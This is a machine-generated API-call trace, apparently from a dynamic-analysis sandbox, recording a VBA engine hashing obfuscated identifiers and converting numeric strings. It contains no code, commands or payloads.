[0067.804] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0067.804] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SAAAAGQ") returned 0x10f0eb [0067.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60a5a, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0067.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60a5a, cbMultiByte=7, lpWideCharStr=0x6885818, cchWideChar=7 | out: lpWideCharStr="SAAAAGQ") returned 7 [0067.804] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf60c40, cb=0x100) returned 0xaf54180 [0067.805] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="On") returned 0x105e8e [0067.805] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error") returned 0x10db3c [0067.805] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Resume") returned 0x10728b [0067.805] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0067.805] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.805] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qoDwUA1G") returned 0x1088c1 [0067.805] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sGUQAo") returned 0x102142 [0067.805] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.805] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="YU_ACX") returned 0x10ad18 [0067.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="287750603") returned 10 [0067.805] VarI4FromStr (in: strIn="287750603", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.805] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wZA_UQGo") returned 0x1067de [0067.805] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tZZcAA") returned 0x109de2 [0067.805] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pUAAGUAA") returned 0x10681c [0067.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="860658513") returned 10 [0067.805] VarI4FromStr (in: strIn="860658513", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="216377560") returned 10 [0067.806] VarI4FromStr (in: strIn="216377560", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="550350428") returned 10 [0067.806] VarI4FromStr (in: strIn="550350428", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="920997540") returned 10 [0067.806] VarI4FromStr (in: strIn="920997540", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="911945343") returned 10 [0067.806] VarI4FromStr (in: strIn="911945343", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.806] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IDAAUX") returned 0x10c4c5 [0067.806] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.806] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ucAABc") returned 0x10402d [0067.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="435878146") returned 10 [0067.806] VarI4FromStr (in: strIn="435878146", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="829466079") returned 10 [0067.806] VarI4FromStr (in: strIn="829466079", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.807] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.807] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WZQBQA") returned 0x10d539 [0067.807] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="336909773") returned 10 [0067.807] VarI4FromStr (in: strIn="336909773", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="666144889") returned 10 [0067.807] VarI4FromStr (in: strIn="666144889", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.807] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="759909822") returned 10 [0067.807] VarI4FromStr (in: strIn="759909822", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="920899973") returned 10 [0067.807] VarI4FromStr (in: strIn="920899973", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.807] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="447037960") returned 10 [0067.807] VarI4FromStr (in: strIn="447037960", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.808] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LA1A4_AX") returned 0x10a829 [0067.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="564272179") returned 10 [0067.808] VarI4FromStr (in: strIn="564272179", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.808] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NXCGwCA") returned 0x10f92b [0067.808] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.808] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.808] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.808] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="QA1G_UAZ") returned 0x10154b [0067.808] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zAA4GAo_") returned 0x10a21c [0067.808] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.808] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="QCoAAC") returned 0x10b4d0 [0067.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="501567366") returned 10 [0067.808] VarI4FromStr (in: strIn="501567366", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.808] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fDBDGcA") returned 0x10118f [0067.808] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wAkUkA") returned 0x1057f1 [0067.809] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RACC1_") returned 0x106c04 [0067.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="868780443") returned 10 [0067.809] VarI4FromStr (in: strIn="868780443", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="923753279") returned 10 [0067.809] VarI4FromStr (in: strIn="923753279", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="468127597") returned 10 [0067.809] VarI4FromStr (in: strIn="468127597", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="368909782") returned 10 [0067.809] VarI4FromStr (in: strIn="368909782", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="917221257") returned 10 [0067.809] VarI4FromStr (in: strIn="917221257", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.809] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="awckUAA") returned 0x10a7ba [0067.809] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.809] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iAAoQXX4") returned 0x104e30 [0067.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="837310715") returned 10 [0067.809] VarI4FromStr (in: strIn="837310715", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="960978303") returned 10 [0067.810] VarI4FromStr (in: strIn="960978303", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.810] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.810] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jDcAAAUA") returned 0x1062fa [0067.810] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="217103481") returned 10 [0067.810] VarI4FromStr (in: strIn="217103481", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="629138258") returned 10 [0067.810] VarI4FromStr (in: strIn="629138258", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.810] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=9 | out: lpWideCharStr="12126364") returned 9 [0067.810] VarI4FromStr (in: strIn="12126364", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="766817359") returned 10 [0067.810] VarI4FromStr (in: strIn="766817359", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.810] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="381239177") returned 10 [0067.810] VarI4FromStr (in: strIn="381239177", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.811] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="G4U1ck") returned 0x10921c [0067.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="591079096") returned 10 [0067.811] VarI4FromStr (in: strIn="591079096", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.811] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HUAGAo") returned 0x107b9f [0067.811] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.811] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.811] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Y_AA4DUA") returned 0x10c64e [0067.811] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x30) returned 0x646f730 [0067.811] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x3a70000 [0067.812] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.812] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="YADA1A") returned 0x106af4 [0067.812] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UQAABkG") returned 0x10d1d0 [0067.812] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.812] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cAAUox") returned 0x10f0ee [0067.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="258697236") returned 10 [0067.812] VarI4FromStr (in: strIn="258697236", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.812] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tGQQAC") returned 0x102135 [0067.812] IMalloc:Realloc (This=0x7fefec05380, pv=0xafc1300, cb=0x1200) returned 0xafc1c10 [0067.813] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="YwD4UZkA") returned 0x105ab5 [0067.813] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="YAADwc") returned 0x102f41 [0067.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=9 | out: lpWideCharStr="73812250") returned 9 [0067.813] VarI4FromStr (in: strIn="73812250", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="188096371") returned 10 [0067.813] VarI4FromStr (in: strIn="188096371", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="299720960") returned 10 [0067.813] VarI4FromStr (in: strIn="299720960", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="431728990") returned 10 [0067.813] VarI4FromStr (in: strIn="431728990", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="794459285") returned 10 [0067.814] VarI4FromStr (in: strIn="794459285", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.814] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FBwXA4B") returned 0x1099c5 [0067.814] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.814] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PAAAAUB") returned 0x103b31 [0067.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="414352560") returned 10 [0067.814] VarI4FromStr (in: strIn="414352560", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="121959079") returned 10 [0067.814] VarI4FromStr (in: strIn="121959079", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.814] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.814] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tQAAQ_Q") returned 0x10ece5 [0067.814] 